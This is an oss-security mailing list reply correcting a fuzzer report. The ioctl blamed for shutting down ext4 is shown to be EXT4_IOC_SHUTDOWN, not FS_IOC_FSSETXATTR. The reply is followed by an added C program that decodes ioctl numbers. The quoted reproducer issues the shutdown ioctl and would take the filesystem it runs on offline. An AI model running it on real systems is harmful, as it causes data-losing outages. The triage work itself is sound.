
List:       oss-security
Subject:    Re: [oss-security] Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down
From:       Xiami <pengyu.tao () yooli ! com>
Date:       2018-08-28 9:45:37
Message-ID: 20180828094537.GA10578 () localvm ! private ! f2light ! com+6A304428CF1ACB2B

On Tue, Aug 28, 2018 at 08:27:50AM +0000, zhrzhang( 洪睿) wrote:
> Hello:
> When I fuzz, I found the kernel always gives no output from the machine, and the error FS_IOC_FSSETXATTR contributes to this.
> The syzlog is as below:
> 
> r0 = creat(&(0x7f0000000140)='./file0\x00', 0x0)
> ioctl$FS_IOC_FSSETXATTR(r0, 0x8004587d, &(0x7f0000000080)={0x0, 0x0, 0x0, 0x8})

Your ioctl command 0x8004587d is exactly EXT4_IOC_SHUTDOWN, defined in fs/ext4/ext4.h.

> 
> The PoC looks like this:
> 
> #define _GNU_SOURCE
> 
> #include <endian.h>
> #include <stdint.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <sys/syscall.h>
> #include <sys/types.h>
> #include <unistd.h>
> 
> uint64_t r[1] = {0xffffffffffffffff};
> 
> int main(void)
> {
>   /* syzkaller scratch area: 16 MiB mapped at 0x20000000 to hold syscall arguments */
>   syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
>   long res = 0;
>   /* create ./file0 in the current directory (on the ext4 filesystem under test) */
>   memcpy((void*)0x20000140, "./file0", 8);
>   res = syscall(__NR_creat, 0x20000140, 0);
>   if (res != -1)
>     r[0] = res;
>   /* argument buffer at 0x20000080; the first __u32 (flags word) is 0 */
>   *(uint32_t*)0x20000080 = 0;
>   *(uint32_t*)0x20000084 = 0;
>   *(uint32_t*)0x20000088 = 0;
>   *(uint32_t*)0x2000008c = 8;
>   *(uint32_t*)0x20000090 = 0;
>   *(uint64_t*)0x20000098 = 0;
>   /* labelled FS_IOC_FSSETXATTR by syzkaller, but 0x8004587d is numerically EXT4_IOC_SHUTDOWN */
>   syscall(__NR_ioctl, r[0], 0x8004587d, 0x20000080);
>   return 0;
> }
> ________________________________
> zhrzhang( 洪睿)
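Xiami's reply hinges on how the kernel packs an ioctl command number, and on the fact that the kernel dispatches on that number, not on the name a fuzzer's syscall description attached to it. The following is an added example, not code from either message in this thread: it decodes 0x8004587d field by field using the generic include/uapi/asm-generic/ioctl.h layout (assumed x86-style bit widths; a few architectures such as powerpc and sparc differ) and compares it with the encoding of FS_IOC_FSSETXATTR, which I take from the uapi headers as _IOW('X', 32, struct fsxattr) with a 28-byte struct; those FS_IOC_FSSETXATTR values are my assumption, not something the page states.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bit layout of the generic Linux ioctl number encoding, reproduced here so
 * the program runs on any host. Assumption: the asm-generic/x86 layout. */
#define IOC_NRBITS    8
#define IOC_TYPEBITS  8
#define IOC_SIZEBITS  14
#define IOC_DIRBITS   2

#define IOC_NRSHIFT   0
#define IOC_TYPESHIFT (IOC_NRSHIFT + IOC_NRBITS)
#define IOC_SIZESHIFT (IOC_TYPESHIFT + IOC_TYPEBITS)
#define IOC_DIRSHIFT  (IOC_SIZESHIFT + IOC_SIZEBITS)

#define IOC_NONE  0U
#define IOC_WRITE 1U
#define IOC_READ  2U

/* Extract the four fields of a command number. */
unsigned ioc_dir(uint32_t cmd)  { return (cmd >> IOC_DIRSHIFT)  & ((1U << IOC_DIRBITS)  - 1); }
unsigned ioc_type(uint32_t cmd) { return (cmd >> IOC_TYPESHIFT) & ((1U << IOC_TYPEBITS) - 1); }
unsigned ioc_nr(uint32_t cmd)   { return (cmd >> IOC_NRSHIFT)   & ((1U << IOC_NRBITS)   - 1); }
unsigned ioc_size(uint32_t cmd) { return (cmd >> IOC_SIZESHIFT) & ((1U << IOC_SIZEBITS) - 1); }

/* Build a command number the way _IOC(dir, type, nr, size) does. */
uint32_t ioc_encode(unsigned dir, unsigned type, unsigned nr, unsigned size)
{
    return ((uint32_t)dir  << IOC_DIRSHIFT)  | ((uint32_t)type << IOC_TYPESHIFT) |
           ((uint32_t)nr   << IOC_NRSHIFT)   | ((uint32_t)size << IOC_SIZESHIFT);
}

/* Render a number the way the kernel headers spell it, e.g. _IOR('X', 125, 4). */
int ioc_describe(uint32_t cmd, char *buf, size_t len)
{
    const char *macro;
    switch (ioc_dir(cmd)) {
    case IOC_NONE:  macro = "_IO";   break;
    case IOC_WRITE: macro = "_IOW";  break;
    case IOC_READ:  macro = "_IOR";  break;
    default:        macro = "_IOWR"; break;
    }
    return snprintf(buf, len, "%s('%c', %u, %u)", macro,
                    (int)ioc_type(cmd), ioc_nr(cmd), ioc_size(cmd));
}

int main(void)
{
    /* The number from the syzkaller log above. */
    const uint32_t from_log = 0x8004587d;
    /* EXT4_IOC_SHUTDOWN is _IOR('X', 125, __u32) in fs/ext4/ext4.h. */
    const uint32_t ext4_shutdown = ioc_encode(IOC_READ, 'X', 125, sizeof(uint32_t));
    /* Assumption from the uapi headers: FS_IOC_FSSETXATTR is _IOW('X', 32, struct fsxattr),
     * and struct fsxattr is 28 bytes. */
    const uint32_t fs_fssetxattr = ioc_encode(IOC_WRITE, 'X', 32, 28);
    char buf[64];

    ioc_describe(from_log, buf, sizeof buf);
    printf("0x%08x decodes as %s\n", from_log, buf);
    printf("EXT4_IOC_SHUTDOWN  = 0x%08x (%s)\n", ext4_shutdown,
           from_log == ext4_shutdown ? "match" : "no match");
    printf("FS_IOC_FSSETXATTR  = 0x%08x (%s)\n", fs_fssetxattr,
           from_log == fs_fssetxattr ? "match" : "no match");
    return 0;
}
```

The practical lesson for triage: a fuzzer's label for an ioctl comes from its syscall description, while the kernel looks only at the 32-bit command word, so two ioctls that share the type character 'X' can be confused by the tooling even though their nr fields (125 versus 32) and directions differ. Decoding the raw number before filing a report avoids attributing an intended administrative shutdown to an unrelated attribute-setting ioctl.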


